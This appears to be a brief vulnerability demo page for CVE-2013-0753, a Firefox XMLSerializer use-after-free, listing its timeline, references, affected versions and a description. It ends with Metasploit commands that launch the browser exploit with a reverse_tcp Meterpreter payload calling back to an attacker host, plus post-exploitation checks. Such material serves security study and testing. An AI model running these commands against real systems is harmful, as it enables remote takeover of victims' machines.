CVE-2013-0753 Firefox XMLSerializer Use After Free

Timeline :

Vulnerability discovered and reported to ZDI by regenrecht
Vulnerability reported to vendor by ZDI the 2012-11-21
Vulnerability corrected by vendor the 2013-01-08
Metasploit PoC provided the 2013-08-23

PoC provided by :

regenrecht
juan vazquez

Reference(s) :

CVE-2013-0753
OSVDB-89021
BID-57209
ZDI-13-006
MFSA-2013-16

Affected version(s) :

All versions of Mozilla Firefox previous version 17.0.2

Tested on :

with Firefox 17.0.1 on Windows XP SP3

Description :

This module exploits a vulnerability found on Firefox 17.0 (< 17.0.2), specifically a use-after-free of an Element object, when using the serializeToStream method with a specially crafted OutputStream defining its own write function. This module has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP SP3.

Commands :

use exploit/windows/browser/mozilla_firefox_xmlserializer
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo